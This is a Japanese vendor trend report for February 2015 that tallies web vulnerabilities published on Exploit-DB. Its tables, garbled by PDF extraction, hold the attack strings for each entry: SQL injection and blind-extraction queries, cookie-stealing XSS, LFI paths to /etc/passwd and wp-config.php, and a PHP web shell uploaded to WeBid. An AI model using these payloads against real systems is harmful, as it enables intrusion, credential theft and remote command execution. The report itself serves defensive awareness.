2015年02月EDB-Report ダウンロード

2015.02
EDB-Report
最新Web脆弱性トレンドレポート(2015.02)
2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム
サマリー
2015年2月は、Exploit-DBの分析結果をみると、前月の1月と同じく、SQLインジェクション(SQL Injection)とクロス・サイト・スクリプティング(Cross Site Scripting:XSS)の攻撃による脆弱性が最も多く報告さ
れました。今月は、ここ6か月間で、脆弱性の報告件数が最も多く、また、危険度が非常に高い脆弱性も多かったことが大きな特徴です。注目すべきなのは、脆弱性の約60%は攻撃実行の難易度が易しいレベルで
あるものの、約65%は危険度が非常に高いものであったことです。そのため、報告件数の最も多いSQLインジェクション(SQL Injection)とクロス・サイト・スクリプティング(Cross Site Scripting:XSS)の攻撃に対して
は、特別な注意が求められます。一方、主なソフトウェア別脆弱性発生件数の場合、脆弱性の報告件数が最も多かったのは、オープンソースCMSのutCMSとWeb基盤PHP Troubleshooting Toolの
PHPBugTrackerであり、その種類も多様でした。小規模で軽量サイトの制作に適したCMSであるutCMSは、今月初めて脆弱性が報告されましたが、そのCMSをご利用であれば、セキュリティパッチを最新状態に更
新し、脆弱性にさらされないように万全を期す必要があります。
1. 脆弱性別件数
脆弱性カテゴリ
SQL インジェクション
(SQL Injection)
クロス サイト スクリプティング
(Cross Site Scripting:XSS)
ローカルファイル挿入
(Local File Inclusion:LFI)
ファイルアップロード
(File Upload)
合計
脆弱性別件数
31
件数
35
30
24
31
25
20
24
15
6
10
6
1
5
1
0
62
SQL インジェクション クロス サイト スクリプ ローカルファイル挿入
(SQL Injection)
ティング
(Local File
(Cross Site
Inclusion:LFI)
ファイルアップロード
(File Upload)
Scripting:XSS)
危険度別分類
2. 危険度別件数
危険度
件数
割合
早急対応要
40
65%
高
22
35%
中
0
0%
合計
62
100%
0
22
早急対応要
高
中
40
3. 攻撃実行の難易度別件数
難易度
件数
割合
難
1
2%
中
24
39%
易
37
60%
合計
62
100%
攻撃実行の難易度別件数
1
24
難
中
易
37
4. 主なソフトウェア別脆弱性発生件数
主なソフトウェア別脆弱性発生件数
件数
u5CMS
phpBugTracker
Wordpress
Magento Server
Zeuscart
Piwigo
eTouch SamePage
WeBid
StaMPi
Sefrengo
Redaxscript
Pragyan
Pandora
IBM Endpoint Manager
Fork
Exponent
Clipbucket
Chamilo
BeehiveForum
17
17
7
3
2
2
2
1
1
1
1
1
1
1
1
1
1
1
1
合計
62
18
17 17
u5CMS
16
phpBugTracker
14
Wordpress
Magento Server
12
Zeuscart
10
8
Piwigo
eTouch SamePage
7
WeBid
6
4
StaMPi
Sefrengo
3
Redaxscript
2 2 2
2
1 1 1 1 1 1 1 1 1 1 1 1
Pragyan
Pandora
0
u5CMS
phpBugTracker
Wordpress
Magento Server
Zeuscart
Piwigo
eTouch SamePage
WeBid
StaMPi
Sefrengo
Redaxscript
Pragyan
Pandora
IBM Endpoint Manager
Fork
Exponent
Clipbucket
Chamilo
BeehiveForum
ソフトウェア名
Copyright 2015 Penta Security Systems Inc. All rights reserved
IBM Endpoint Manager
Fork
Exponent
Clipbucket
Chamilo
EDB-Report
最新Web脆弱性トレンドレポート(2015.02)
2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
危険度分類基準
早急対応要:攻撃が成功した場合システムへ侵入可
高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす
中:情報漏洩
攻撃実行難易度分類基準
難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得
するため、高度な攻撃コードを採用したパターン、知らされていない攻撃
コードを採用したパターンのいずれかに該当する
中:攻撃手法自体は難しくないが、迂回コードを採用したパターン
易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、
既知の攻撃コードを採用したパターンのいずれかに該当する
** 5件以上発生した主なソフトウェア別脆弱性の詳細情報
EDB 番号
攻撃難易度
危険度
脆弱性名
ソフトウェア名
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
LFI
Injection
Injection
Injection
Injection
Injection
Injection
Injection
LFI
Injection
XSS
XSS
XSS
Injection
Injection
XSS
Injection
Injection
XSS
Injection
Injection
XSS
Injection
XSS
Injection
Injection
易
易
易
易
易
易
易
易
易
易
易
易
易
易
易
易
易
中
易
中
中
中
中
中
中
中
中
中
中
中
中
中
中
中
高
高
高
高
高
高
高
高
高
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
高
高
高
高
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
早急対応要
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
U5cms
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
phpBugTracker
36039
LFI
易
早急対応要
36054
36058
SQL Injection
SQL Injection
中
易
早急対応要
早急対応要
36061
SQL Injection
難
早急対応要
36086
SQL Injection
中
早急対応要
36086
36097
XSS
XSS
易
易
早急対応要
早急対応要
u5CMS 3.9.3 - index.php XSS 脆弱性
u5CMS 3.9.3 - copy.php XSS 脆弱性
u5CMS 3.9.3 - delete.php XSS 脆弱性
u5CMS 3.9.3 - done.php XSS 脆弱性
u5CMS 3.9.3 - editor.php XSS 脆弱性
u5CMS 3.9.3 - notdone.php XSS 脆弱性
u5CMS 3.9.3 - sendfile.php XSS 脆弱性
u5CMS 3.9.3 - characters.php XSS 脆弱性
u5CMS 3.9.3 - thumb.php LFI 脆弱性
u5CMS 3.9.3 - copy2.php SQL Injection 脆弱性
u5CMS 3.9.3 - localize.php SQL Injection 脆弱性
u5CMS 3.9.3 - meta2.php SQL Injection 脆弱性
u5CMS 3.9.3 - metai.php SQL Injection 脆弱性
u5CMS 3.9.3 - nc.php SQL Injection 脆弱性
u5CMS 3.9.3 - new2.php SQL Injection 脆弱性
u5CMS 3.9.3 - rename2.php SQL Injection 脆弱性
u5CMS 3.9.3 - deletefile.php LFI 脆弱性
phpBugTracker 1.6.0 - project.php SQL Injection 脆弱性
phpBugTracker 1.6.0 - project.php XSS 脆弱性
phpBugTracker 1.6.0 - user.php XSS 脆弱性
phpBugTracker 1.6.0 - group.php XSS 脆弱性
phpBugTracker 1.6.0 - group.php SQL Injection 脆弱性
phpBugTracker 1.6.0 - status.php SQL Injection 脆弱性
phpBugTracker 1.6.0 - status.php XSS 脆弱性
phpBugTracker 1.6.0 - resolution.php SQL Injection 脆弱性
phpBugTracker 1.6.0 - severity.php SQL Injection 脆弱性
phpBugTracker 1.6.0 - severity.php XSS 脆弱性
phpBugTracker 1.6.0 - priority.php SQL Injection 脆弱性
phpBugTracker 1.6.0 - os.php SQL Injection 脆弱性
phpBugTracker 1.6.0 - os.php XSS 脆弱性
phpBugTracker 1.6.0 - database.php SQL Injection 脆弱性
phpBugTracker 1.6.0 - database.php XSS 脆弱性
phpBugTracker 1.6.0 - site.php SQL Injection 脆弱性
phpBugTracker 1.6.0 - bug.php SQL Injection 脆弱性
Wordpress Theme Divi Arbitrary - admin-ajax.php Local File
Inclusion Vulnerability 脆弱性
Wordpress Survey and poll - SQL Injection 脆弱性
Wordpress Video Gallery 2.7.0 - SQL Injection 脆弱性
WordPress Webdorado Spider Event Calendar 1.4.9 - adminajax.php SQL Injection 脆弱性
WonderPlugin Audio Player 2.0 - admin-ajax.php SQL Injection 脆
弱性
WonderPlugin Audio Player 2.0 - admin-ajax.php XSS 脆弱性
WordPress Fancybox 3.0.2 - fancybox.php XSS 脆弱性
36029
36029
36029
36029
36029
36029
36029
36029
36028
36027
36027
36027
36027
36027
36027
36027
36026
36160
36160
36160
36160
36160
36160
36160
36160
36160
36160
36160
36160
36160
36160
36160
36160
36160
脆弱性カテゴリ
SQL
SQL
SQL
SQL
SQL
SQL
SQL
SQL
SQL
SQL
SQL
SQL
SQL
SQL
SQL
SQL
SQL
Copyright 2015 Penta Security Systems Inc. All rights reserved
Wordpress
Wordpress
Wordpress
Wordpress
Wordpress
Wordpress
Wordpress
EDB-Report
最新Web脆弱性トレンドレポート(2015.02)
2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2015-02-02
EDB番号
35972
脆弱性カテゴリ
SQL Injection
攻撃難易度
易
2015-02-04
35991
SQL Injection
易
2015-02-05
35996
LFI
易
2015-02-05
35996
XSS
易
2015-02-05
35996
XSS
易
2015-02-09
36039
LFI
易
2015-02-09
36031
LFI
易
2015-02-09
36029
XSS
易
2015-02-09
36029
XSS
易
2015-02-09
36029
XSS
易
2015-02-09
36029
XSS
易
2015-02-09
36029
XSS
易
2015-02-09
36029
XSS
易
2015-02-09
36029
XSS
易
2015-02-09
36029
XSS
易
2015-02-09
36028
LFI
易
2015-02-09
36027
SQL Injection
易
2015-02-09
36027
SQL Injection
易
2015-02-09
36027
SQL Injection
易
2015-02-09
36027
SQL Injection
易
2015-02-09
36027
SQL Injection
易
2015-02-09
2015-02-09
2015-02-09
36027
36027
36026
SQL Injection
SQL Injection
LFI
易
危険度
脆弱性名
Sefrengo CMS 1.6.1 早急対応要 main.php SQL Injection 脆弱
性
Pragyan CMS 3.0 - SQL
Injection 脆弱性
Magento Server MAGMI
高
Plugin - ajax_pluginconf.php
LFI 脆弱性
Magento Server MAGMI
高
Plugin - magmi.php XSS 脆弱
性
Magento Server MAGMI
Plugin 高
magmi_import_run.php XSS
脆弱性
Wordpress Theme Divi
Arbitrary - admin-ajax.php
早急対応要
Local File Inclusion
Vulnerability 脆弱性
StaMPi - fotogalerie.php Local
高
File Inclusion 脆弱性
u5CMS 3.9.3 - index.php XSS
高
脆弱性
u5CMS 3.9.3 - copy.php XSS
高
脆弱性
u5CMS 3.9.3 - delete.php
高
XSS 脆弱性
u5CMS 3.9.3 - done.php XSS
高
脆弱性
早急対応要
高
攻撃コード
POST /sefrengo/backend/main.php HTTP/1.1
Host: research-itasvn.rhcloud.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:35.0) Gecko/20100101 Firefox/35.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.
9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: browserspy_js=1;
sefrengo=8167bb07461d09b026b28179f7863562
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
u5CMS 3.9.3 - localize.php
SQL Injection 脆弱性
u5CMS 3.9.3 - meta2.php
早急対応要
SQL Injection 脆弱性
u5CMS 3.9.3 - metai.php SQL
早急対応要
Injection 脆弱性
u5CMS 3.9.3 - nc.php SQL
早急対応要
Injection 脆弱性
/wp-admin/adminajax.php?action=revslider_show_image&img=../wpconfig.php
/path/fotogalerie.php?id=../../../../../../../../../../etc/
passwd%00
/u5cms/index.php?c=start"><script>alert(1)</script
>&l=e&p=1&r=
/u5cms/u5admin/copy.php?name=album"><img%20
src%3da%20onerror%3dalert(7)>
/u5cms/u5admin/delete.php?name=a"><img%20src
%3da%20onerror%3dalert(8)>
/u5cms/u5admin/done.php?n=inserted%20test"><sc
ript>alert(11)</script>
易
易
u5CMS 3.9.3 - deletefile.php
早急対応要
LFI 脆弱性
Wordpress
Wordpress
Theme Divi
Arbitrary
StaMPi
StaMPi
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
u5CMS
u5CMS 3.9.3
name=album' and '2'='1
/u5cms/u5admin/editor.php?c=start' and '2'='1
/u5cms/u5admin/localize.php?name=album' and
'2'='1
/u5cms/u5admin/metai.php?typ=a&name=album'
and '2' = '1
/u5cms/u5admin/nc.php?name=o' and '2'='1
POST /u5cms/u5admin/new2.php?name=album
HTTP/1.1
Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */*
u5CMS 3.9.3 - new2.php SQL
早急対応要
Accept-Language: ko-KR
Injection 脆弱性
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
u5CMS 3.9.3 - rename2.php
早急対応要
SQL Injection 脆弱性
Sefrengo CMS
1.6.1
/magmi/web/magmi_import_run.php?</script><scrip
Magento Server
t>alert('XSS');</script>
Magento Server
MAGMI Plugin
- notdone.php
早急対応要
Sefrengo
Magento Server
/magmi/web/magmi.php?configstep=2&profile=</script><script>alert('XSS');</script>
Magento Server
MAGMI Plugin
u5CMS 3.9.3 - editor.php XSS /u5cms/u5admin/editor.php?c=c"><script>alert(12)
脆弱性
</script>
u5CMS 3.9.3
XSS 脆弱性
u5CMS 3.9.3
XSS 脆弱性
u5CMS 3.9.3
XSS 脆弱性
u5CMS 3.9.3
脆弱性
対象環境
value_to_save=45&sefrengo=8167bb07461d09b026b
28179f7863562&area=settings&action=save_value&v
/user:1%27+and+1=2+union+select+database%28
Pragyan CMS
Pragyan
%29,version%28%29,3+--+
3.0
/magmi/web/ajax_pluginconf.php?file=../../../../../../.
Magento Server
./../../../../etc/passwd&plugintype=utilities&pluginclas Magento Server
MAGMI Plugin
s=CustomSQLUtility
/u5cms/u5admin/notdone.php?n=wrong%20name,%
20not%20deleted%20<script>alert(14)</script>
- sendfile.php
/u5cms/u5admin/sendfile.php?name=shortreference&
高
l=_frd"><script>alert(16)</script>&typ=d
- characters.php /u5cms/u5admin/characters.php?more=335&s=335"
高
><script>alert(17)</script>
- thumb.php LFI /u5cms/thumb.php?w=100&f=../../../../../../../../../..
高
/etc/passwd%00
POST /u5cms/u5admin/copy2.php?name=album
HTTP/1.1
Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */*
u5CMS 3.9.3 - copy2.php
早急対応要
Accept-Language: ko-KR
SQL Injection 脆弱性
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Content-Type:application/x-www-form-urlencoded
高
対象プログラム
name=test' and '2'='1 "&typ=e
GET
/u5cms/u5admin/rename2.php?name=valbum&newn
ame=valbum2' and '2'='1&typ=a
/u5cms/u5admin/deletefile.php?typ=d&name=shortre
ference&f=../../../../../../deleteme.txt
Copyright 2015 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2015.02)
2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2015-02-09
EDB番号
36023
脆弱性カテゴリ
SQL Injection
攻撃難易度
易
危険度
脆弱性名
攻撃コード
POST /redaxscript/ HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:34.0) Gecko/20100101 Firefox/34.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.
9,*/*;q=0.8
Redaxscript CMS 2.2.0 Accept-Language: en-US,en;q=0.5
早急対応要 search.php SQL Injection 脆弱 Accept-Encoding: gzip, deflate
性
Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872;
GEAR=local-5422433b500446ead50002d4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Fork CMS 3.8.5 - form SQL
Injection 脆弱性
2015-02-09
36041
SQL Injection
易
早急対応要
2015-02-09
36040
SQL Injection
中
Chamilo LMS 1.9.8 早急対応要 m_category.php SQL
Injection 脆弱性
高
search_terms=test' or
'1'='1&search_post=&token=24bcb285bc6f5c93203e
/private/en/locale/index?form=filter&form_token=68a
a8d273e0bd95a70e67372841603d5&application=&m
odule=&type[]=act'+(select * from
(select(sleep(10)))a)+'&type[]=err&type[]=lbl&type[]
=msg&language[]=en&name=&value=
/chamilourl/main/reservation/m_category.php?action=delete&
id=0 UNION (SELECT IF(substr(password,1,1) =
CHAR(100), SLEEP(5), 0) FROM user WHERE user_id
= 1)
/cgi-bin/bfenterprise/BESGatherMirrorNew.exe/IBM Endpoint Manager - XSS gatherversion?Body=GatherSpecifiedVersion&version
脆弱性
=1&url=http://"><script>alert(/XSS/)</script>&vers
ion=1&useCRC=0
2015-02-11
36057
XSS
易
2015-02-11
36055
SQL Injection
易
Pandora FMS 5.1 SP1 早急対応要 index.php SQL Injection 脆弱
性
2015-02-11
36054
SQL Injection
中
Wordpress Survey and poll 早急対応要
SQL Injection 脆弱性
2015-02-12
36058
SQL Injection
易
早急対応要
2015-02-12
36509
XSS
易
2015-02-13
36061
SQL Injection
難
2015-02-16
36086
SQL Injection
中
/pandora/index.php?extension_in_menu=estado&sec
=extensions&sec2=extensions/agents_modules&refr=
&offset=-1' and '2'='1'-/wp-admin/adminajax.php?action=ajax_survey&sspcmd=save&survey_i
d= 3556498 AND
ORD(MID((IFNULL(CAST(DATABASE() AS
CHAR),0x20)),3,1))>75
/wp-admin/adminajax.php%3Faction=rss&type=video&vid=1%20and%
201=1
対象プログラム
対象環境
Redaxscript
Redaxscript CMS
2.2.0
Fork
Fork CMS 3.8.5
Chamilo
Chamilo LMS
1.9.8
IBM Endpoint
Manager
IBM Endpoint
Manager 9.1.x
versions earlier
than 9.1.1229又
は9.2.x versions
earlier than
9.2.1.48
Pandora
Pandora FMS
5.1 SP1
Wordpress
Wordpress
Survey and poll
Wordpress
Video Gallery
2.7.0
Exponent CMS 2.3.1 - XSS 脆
Exponent CMS
/news/show/title/"><script>alert(7)</script>time-for-a-heavy-harvest-new-release/src/@rand
早急対応要
Exponent
弱性
2.3.1
/wp-admin/adminajax.php?action=spiderbigcalendar_month&theme_id
=13&calendar=1&select=month,list,week,day,&date=
201502&many_sp_calendar=1&cur_page_url=%s&cat_id=
1)%%20UNION%%20SELECT%%20%s,1,%%20FRO
WordPress Webdorado Spider
WordPress
M_UNIXTIME(1423004400),1,(SELECT%%20CONCAT
Event Calendar 1.4.9 Webdorado
早急対応要
(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35)
Wordpress
admin-ajax.php SQL Injection
Spider Event
)%%20FROM%%20information_schema.tables%%20
脆弱性
Calendar 1.4.9
WHERE%%20table_name%%20LIKE%%20(%%20SE
LECT%%20CHAR(37,%%20117,%%20115,%%2010
1,%%20114,%%20115)%%20)%%20LIMIT%%201)
,1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%2
0114,%%20101,%%20112,%%20101,%%2097,%%
20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;-POST /wp-admin/adminajax.php?action=wonderplugin_audio_save_item
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
WonderPlugin Audio Player
Wordpress
Chrome/16.0.912.75 Safari/535.7
早急対応要 2.0 - admin-ajax.php SQL
Wordpress
WonderPlugin
Accept: */*
Injection 脆弱性
Audio Player 2.0
Content-Type: application/x-www-form-urlencoded
charset=UTF-8
Wordpress Video Gallery
2.7.0 - SQL Injection 脆弱性
Wordpress
item[id]=1 UNION (SELECT 1, 2, 3, 4,
IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0)
FROM /wp-admin/admin`wp_users` WHERE ID = 1)
POST
2015-02-16
36086
XSS
易
WonderPlugin Audio Player
早急対応要 2.0 - admin-ajax.php XSS 脆
弱性
ajax.php?action=wonderplugin_audio_save_item
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
item[id]=<script>alert(String.fromCharCode(88,83,8
3));</script>&item[customcss]=</style><script>aler
t(String.fromCharCode(88,83,83));</script>
Copyright 2015 Penta Security Systems Inc. All rights reserved
Wordpress
Wordpress
WonderPlugin
Audio Player 2.0
EDB-Report
最新Web脆弱性トレンドレポート(2015.02)
2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難易度
2015-02-16
36089
SQL Injection
中
2015-02-16
36089
LFI
易
2015-02-16
36097
XSS
易
2015-02-19
36127
XSS
中
2015-02-19
36127
SQL Injection
中
2015-02-23
2015-02-23
36154
36155
XSS
File Upload
易
易
危険度
脆弱性名
eTouch SamePage
早急対応要 v4.4.0.0.239 - SQL Injection
脆弱性
攻撃コード
対象プログラム
/cm/blogrss/feed?entity=mostviewedpost&analyticsTy
pe=blog&catId=-1) AND
6412=BENCHMARK(10000000,MD5(0x73764b7a))
AND (3198=3198&count=10&et_cw=850&et_ch=600
eTouch
SamePage
eTouch
SamePage
v4.4.0.0.239
eTouch
SamePage
eTouch
SamePage
v4.4.0.0.239
WordPress
WordPress
Fancybox 3.0.2
eTouch SamePage
/cm/newui/blog/export.jsp?filepath=../conf/Catalina/l
v4.4.0.0.239 - export.jsp LFI
ocalhost/cm.xml&start=true&et_cw=350&et_ch=100
脆弱性
POST /wp-admin/admin-ajax.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
WordPress Fancybox 3.0.2 早急対応要
Accept: */*
fancybox.php XSS 脆弱性
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
高
action=update&mfbfw[padding]=</script><script>al
ert('xss')</script>
/admin.php?page=plugin-AdminTools<img src=n
Piwigo 2.7.3 - admin.php XSS onerror=eval(String.fromCharCode(97,108,101,114,1
早急対応要
脆弱性
16,40,100,111,99,117,109,101,110,116,46,99,111,1
11,107,105,101,41,59)) >
POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0)
Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml
xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Piwigo 2.7.3 - admin.php SQL Accept-Encoding: gzip, deflate
早急対応要
Injection 脆弱性
Cookie:
pwg_display_thumbnail=no_display_thumbnail;
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
高
早急対応要
Beehive Forum 1.4.4 edit_refs.php XSS 脆弱性
WeBid 1.1.1 - ajax.php File
Upload 脆弱性
start=2015-01-08 &end=2015-01-09
&types[]=none&types[]=picture&types[]=high&types
[]=other&user=2)
AND 1=2 UNION SELECT
POST /edit_prefs.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
対象環境
Piwigo
Piwigo 2.7.3
Piwigo
Piwigo 2.7.3
BeehiveForum
BeehiveForum
1.4.4
WeBid
WeBid 1.1.1
Clipbucket
Clipbucket 2.7
RC3 0.9
webtag=DEFAULT&nickname=test&email=test&firstn
ame=test&lastname=test&dob_day=3&dob_month=3
&dob_year=1989&homepage_url=<script>alert(1);<
/script>&homepage_url_global=Y&pic_url=<script>al
ert(1);</script>&pic_url_global=Y&avatar_url=<scrip
t>alert(1);</script>&avatar_url_global=Y&save=Sav
POST /ajax.php?do=uploadaucimages HTTP/1.1
Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2
-----------------------------7dd10029908f2
Content-Disposition: form-data; name="Filedata";
filename="shell.php"
Content-Type: application/octet-stream
2015-02-23
36156
SQL Injection
易
2015-02-23
36159
XSS
中
2015-02-23
36159
SQL Injection
中
2015-02-23
36160
SQL Injection
中
高
Clipbucket 2.7 RC3 0.9 view_item.php SQL Injection
脆弱性
<?php error_reporting(0); print(___);
passthru(base64_decode(\$_SERVER[HTTP_CMD]));?
>
/clipbucket/view_item.php?item=a%27%20or%20%2
7a%27=%27a&type=photos&collection=9
/index.php?do=search&search=%22%3E%3Cbody%2
Zeuscart v.4 - index.php XSS
Zeuscart
0onload=eval%28alert%28document.cookie%29%29
脆弱性
%20%3E%3C!-/admin/?do=disporders&action=detail&id=1+and+1=
2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
Zeuscart v.4 - /admin SQL
早急対応要
Zeuscart
,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3
Injection 脆弱性
2,database%28%29,34,35,version%28%29,37,38+-+
phpBugTracker 1.6.0 /admin/project.php?op=edit_component&id=1%27+a
早急対応要 project.php SQL Injection 脆 nd+1=2+union+select+1,2,database%28%29,user% phpBugTracker
弱性
28%29,5,6,version%28%29,8,9,10,11,12+--+
高
Copyright 2015 Penta Security Systems Inc. All rights reserved
Zeuscart v.4
Zeuscart v.4
phpBugTracker
1.6.0
EDB-Report
最新Web脆弱性トレンドレポート(2015.02)
2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難易度
危険度
脆弱性名
2015-02-23
36160
XSS
易
高
phpBugTracker 1.6.0 project.php XSS 脆弱性
2015-02-23
36160
XSS
中
高
phpBugTracker 1.6.0 user.php XSS 脆弱性
2015-02-23
36160
XSS
中
高
phpBugTracker 1.6.0 group.php XSS 脆弱性
2015-02-23
36160
SQL Injection
中
2015-02-23
36160
SQL Injection
中
2015-02-23
36160
XSS
中
2015-02-23
36160
SQL Injection
中
2015-02-23
36160
SQL Injection
中
2015-02-23
36160
XSS
中
早急対応要
2015-02-23
36160
SQL Injection
中
phpBugTracker 1.6.0 早急対応要 priority.php SQL Injection 脆
弱性
2015-02-23
36160
SQL Injection
中
早急対応要
phpBugTracker 1.6.0 os.php SQL Injection 脆弱性
2015-02-23
36160
XSS
中
早急対応要
phpBugTracker 1.6.0 os.php XSS 脆弱性
2015-02-23
36160
SQL Injection
中
phpBugTracker 1.6.0 早急対応要 database.php SQL Injection
脆弱性
2015-02-23
36160
XSS
中
早急対応要
phpBugTracker 1.6.0 database.php XSS 脆弱性
2015-02-23
36160
SQL Injection
中
早急対応要
Name=<script>alert(1);</script>
phpBugTracker 1.6.0 /admin/site.php?op=edit&site_id=5%27+and+1=2+u
phpBugTracker
site.php SQL Injection 脆弱性 nion+select+1,version%28%29,database%28%29
phpBugTracker
1.6.0
2015-02-23
36160
SQL Injection
中
早急対応要
phpBugTracker 1.6.0 /bug.php?op=add&project=1%27+and+1=2+union+
bug.php SQL Injection 脆弱性 select+user%28%29
phpBugTracker
1.6.0
phpBugTracker 1.6.0 group.php SQL Injection 脆弱
性
phpBugTracker 1.6.0 早急対応要 status.php SQL Injection 脆弱
性
高
早急対応要
phpBugTracker 1.6.0 status.php XSS 脆弱性
phpBugTracker 1.6.0 早急対応要 resolution.php SQL Injection
脆弱性
phpBugTracker 1.6.0 早急対応要 severity.php SQL Injection 脆
弱性
phpBugTracker 1.6.0 severity.php XSS 脆弱性
攻撃コード
POST /admin/project.php?op=add HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
対象プログラム
対象環境
phpBugTracker
phpBugTracker
1.6.0
project_name=<script>alert(1);</script>
/admin/user.php?op=edit&use_js=1%22%3E%3Cscri
phpBugTracker
pt%3Ealert%28document.cookie%29%3C/script%3E
&user_id=1
/admin/group.php?op=edit&use_js=1%22%3E%3Csc
ript%3Ealert%28document.cookie%29%3C/script%3E phpBugTracker
&group_id=1
/admin/group.php?op=edit&use_js=1&group_id=1+a
nd+SLEEP%2810%29
phpBugTracker
/admin/status.php?op=edit&status_id=1%27+and+1
=2+union+select+1,user%28%29,database%28%29, phpBugTracker
version%28%29,5
POST
/admin/status.php?op=edit&use_js=1&status_id=0
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
phpBugTracker
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
Description=<script>alert(1);</script>
/admin/resolution.php?op=edit&resolution_id=1%27
phpBugTracker
+and+1=2+union+select+1,user%28%29,database
%28%29,version%28%29
/admin/severity.php?op=edit&severity_id=1%27+and
+1=2+union+select+1,user%28%29,database%28% phpBugTracker
29,version%28%29,5
POST
/admin/severity.php?op=edit&use_js=1&severity_id=
0 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
phpBugTracker
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
Description=<script>alert(1);</script>
/admin/priority.php?op=edit&priority_id=1%27+and
+1=2+union+select+1,user%28%29,database%28%
29,4,version%28%29+--+
